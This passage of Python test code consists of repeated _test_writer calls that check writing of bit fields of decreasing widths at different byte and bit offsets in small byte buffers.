_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 20, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 19, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 18, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 17, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 16, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 15, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 14, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 13, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 12, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 11, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 10, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 9, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 8, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 7, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 6, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 5, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 4, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 3, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 2, False, 1)
_test_writer(b"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 2, 1, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 32, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 31, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 30, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 29, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 28, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 27, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 26, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 25, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 24, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 23, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 22, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 21, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 20, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 19, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 18, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 17, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 16, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 15, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 14, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 13, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 12, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 11, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 10, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 9, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 8, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 7, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 6, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 5, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 4, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 3, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 2, False, 1)
_test_writer(b"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 1, 1, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 32, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 31, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 30, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 29, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 28, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 27, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 26, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 25, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 24, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 23, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 22, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 21, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 20, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 19, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 18, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 17, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 16, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 15, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 14, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 13, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 12, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 11, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 10, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 9, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 8, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 7, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 6, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 5, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 4, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 3, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 2, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 1, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 64, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 63, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 62, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 61, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 60, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 59, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 58, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 57, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 56, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 55, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 54, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 53, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 52, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 51, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 50, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 49, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 48, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 47, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 46, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 45, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 44, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 43, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 42, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 41, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 40, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 39, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 38, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 37, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 36, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 35, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 34, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 33, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 32, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 31, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 30, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 29, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 28, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 27, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 26, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 25, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 24, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 23, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 22, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 21, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 20, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 19, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 18, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 17, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 16, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 15, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 14, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 13, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 12, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 11, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 10, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 9, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 8, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 7, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 6, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 5, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 4, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 3, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 2, False, 1)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 8, 1, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 64, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 63, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 62, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 61, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 60, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 59, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 58, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 57, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 56, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 55, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 54, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 53, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 52, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 51, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 50, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 49, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 48, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 47, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 46, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 45, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 44, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 43, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 42, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 41, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 40, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 39, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 38, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 37, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 36, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 35, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 34, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 33, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 32, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 31, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 30, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 29, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 28, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 27, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 26, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 25, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 24, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 23, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 22, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 21, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 20, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 19, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 18, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 17, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 16, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 15, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 14, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 13, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 12, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 11, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 10, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 9, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 8, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 7, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 6, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 5, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 4, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 3, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 2, False, 1)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 7, 1, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 64, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 63, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 62, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 61, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 60, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 59, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 58, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 57, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 56, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 55, False, 1)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 6, 54, False, 1)
